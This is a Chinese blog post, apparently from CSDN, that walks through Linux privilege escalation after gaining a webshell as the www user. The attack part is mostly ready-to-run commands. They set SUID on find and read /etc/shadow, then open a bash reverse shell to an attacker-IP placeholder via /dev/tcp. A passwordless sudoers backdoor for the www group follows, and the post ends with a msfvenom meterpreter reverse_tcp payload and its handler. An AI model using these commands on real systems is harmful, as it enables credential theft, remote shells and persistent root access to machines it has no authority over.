linux的一些提权方式

最新推荐文章于 2024-05-08 13:52:39 发布
最新推荐文章于 2024-05-08 13:52:39 发布
阅读量805 收藏 8
点赞数 12
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shurongyugong/article/details/134687155
版权

一、find命令提权+sudo提权

        在搭建场景时候,蚁剑上线后发现是www用户,限制好大,修改一些东西使他能够提权

  1. 先在机器中给 /usr/bin/find 赋予“u+s”的权限,这个是find命令的默认位置
  3. 有s 表示可以提权
  4. 此时可以直接执行命令

    find /usr/bin/find -exec cat /etc/shadow \;

    查看普通用户没有权限查看的文件

  5. 接下来可以开通监听,获取反弹shell

  6. nc -lvvnp 9919

  7. #!/bin/bash
# This is a comment - it will be ignored by the shell

# This is a command that will be executed
find /etc/passwd -exec bash -ip >& /dev/tcp/攻击机IP/9919 0>&1 \;

##(注:最后一行代码可以直接执行的,但是我在蚁剑上执行不成功,所以写成脚本来用)

  8. 可以看到此时我们并不是完全的root权限,但是编辑权限是够的,接下来为www用户组做sudo免密,使用echo将内容加入到/etc/sudoers文件中

  9. echo '%www ALL=(ALL:ALL)   NOPASSWD:ALL' >> /etc/sudoers

  10. 再开一个监听,并重新上传新脚本zxcv,然后使用sudo执行zxcv文件

  12. #!/bin/bash
# This is a comment - it will be ignored by the shell
# This is a command that will be executed
find /etc/passwd -exec bash -ip >& /dev/tcp/攻击机IP/9914 0>&1 \;

  13. 铛铛,此时就是root权限了

  14. 后面还可以往蚁剑上面上传msf木马,然后在这里执行文件,这一msf也用以root用户权限上线了

  15. # 生成msf木马
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=攻击机IP lport=7777 -f elf > 4.elf

# 开启msf监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 攻击机IP
set lport 7777
run

殊荣予我
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
深度分析linux提权之SUID提权|Find提权|NMAP提权|VIM提权...
qq_60115503的博客
05-07 2781
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限,SGID与SUID相似,只是执行程序时获得的是文件属组的权限
Linux下,给普通用户提权的方法,su与sudo命令,sudo需要提前在sudoers文件中配置
ganfanren00001的博客
01-02 6880
Linux下,给普通用户提权的方法,su与sudo命令 一、需要提权的场景: 1、普通用户没有足够的访问权限 2、root权限太强应该少用 3、普通用户不得不执行特殊指令时需要提权 su,永久提权,不退出就可以一直用的命令: su //switching user交换用户 注意: 用户用$表示,root用#表示 普通用户使用命令 su root 使用root权限登陆,密文输入超管密码后,用户就会变成超管root登陆。 用完退出超管root su username 也可以使用户切换到其他用户,不一定只
Linux常用六种提权方式
最新发布
qq_59102311的博客
05-08 1635
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。原理:SUID提权的原理与Linux进程的UID有关,进程在运行的时候有以下三个UID:(A)Real UID:执行该进程的用户的UID。
Linux中sudo提权(简单明了一看就会!!!)
Aprilqxs的博客
06-03 1454
abc组 可以以tom用户的身份在server1主机上无密码执行 rm -rf , remove , del 命令。#abc 用户可以以任何用户身份在任何主机上无需密码的执行mkdir和useradd命令。#ABC用户可已在以任何用户身份在任何主机上 无需密码的执行任何命令。如果有用户需要做提权,就在这行下照格式写一行配置就OK了~用户 用户=(主机名) 命令列表。字段4(也就是最后的ALL): 执行的命令。字段2(ALL=):以哪个用户的身份。希望这些知识点对大家有帮助~~~~
Linux 提权学习
Goodric的博客
04-15 893
提权的目的是获取 root 权限 root 权限可获取 shadow 文件中的密码 Hash,若内网环境中存在「账户/密码复用」的情况,可用于横向扩展
网安笔记——提权的各种姿势
qq_64875725的博客
09-13 272
SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。1、使用find命令查看拥有suid权限的文件2、使用exec查看当前用户,text必须是可以找到的文件名,不然会出错,3、然后使用find命令来提权
权限提升-linux提权手法总结
01-14
权限提升-linux提权手法总结
Linux提权扫描脚本
04-28
Linux提权扫描脚本
Linux提权手法总结以及 Linux提权exp集合
02-22
Linux常见提权总结包括(内核漏洞提权、suid提权、定时任务提权、sudo提权等等)
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
linux 2.6.17 提权
07-04
linux 2.6.17 提权
linux提权
mlws1900的博客
07-08 2431
-rw表示文件所有者权限为可读可写不可执行对应第一个root表示文件所有者为root-r--表示只读对应第二个root表示文件所属的组r--代表着other,其他用户(除了该文件所有者和该文件所属组)的权限为只读更改文件权限以上第一张图片的权限用数字(权限码)表示为644(可读可写为4+2,只读为4) 原理:部分命令 特定的权限 验证当前用户密码即可执行root权限 查看哪些命令可以以root执行 查看passwd文件第一列,用户 利用以上命令可提权至rootGTFOBins其他利用方
Linux提权!!!
huohaowen的博客
04-02 1054
黑客视角开始::!!!!假如我是一个黑客,本来想着要suid提权,但是误打误撞,发现了一个不知道什么玩意(请忽略我的find的suid位)那么我们就去试一下shell是个什么东西发现,好好好,就你这个逆天运维,直接给我运行了cat /etc/passwd对吧然后我们再去看一下权限???!!!!!suid位!!!!就可以去考虑提权了,
Linux中如何给普通用户提权
狂小伍的博客
01-26 2004
Linux中给普通用户提权
find命令提权常用命令
墨痕诉清风的博客
06-07 1738
查看具有suid 权限的可执行二进制程序 查找root权限可写文件 其它用户也可以写 查找root权限可写、可执行文件 其它用户也可以写、执行 查找当前用户可读文件 find提权 若find命令suid在输出结果中,执行如下代码,提权...
Linux SUID提权&脏牛提权
m0_65096687的博客
05-24 928
设置了SUID后,文件启动的时候就会以root的权限去运行。就是一个普通用户运行的时候,因为有SUID,所以用root权限去运行它。SUID Files 还有一个 Possible interserting SUID files。全部的SUID文件和一个可能可以利用的SUID文件。连接上来后把漏洞检测的脚本上传至tmp目录运行。这是利用find手动查找有SUID文件的命令。这里不知道啥原因,反弹的shell还是yx。然后我们就要观察文件中是否存在以下文件。我们就利用find进行SUID提权
linux基本提升权限手法
actistsec的博客
10-18 184
linux简单的提升权限利用手法
linux提权——提权大赏
qq_55202378的博客
04-20 792
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现提权;时本来就是root权限,预先加载共享库shell.so时,也是以root用户的权限去加载的。
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
Linux 常见的提权方式
05-20
Linux 系统中,常见的提权方式包括以下几种: 1. SUID 提权:当一个普通用户执行一个被设置了 SUID 位的可执行文件时,该进程会以拥有该文件所有者权限的身份运行,从而可以实现提权。 2. 可以写入的 PATH:当一个普通用户可以在 PATH 中的某个目录下写入一个可执行文件,并且该目录在 root 的 PATH 中,那么当 root 执行该文件时,就可以获取 root 权限。 3. LD_PRELOAD 提权:通过设置 LD_PRELOAD 环境变量来加载一个恶意的共享库,从而篡改程序行为,实现提权。 4. 系统服务提权:当一个系统服务存在漏洞时,攻击者可以利用该漏洞来提权。 5. 内核漏洞提权:当内核存在漏洞时,攻击者可以利用该漏洞来提权。 总的来说,保护 Linux 系统的安全最好的方法是保持系统的更新,禁止不必要的服务和端口,以及限制用户权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值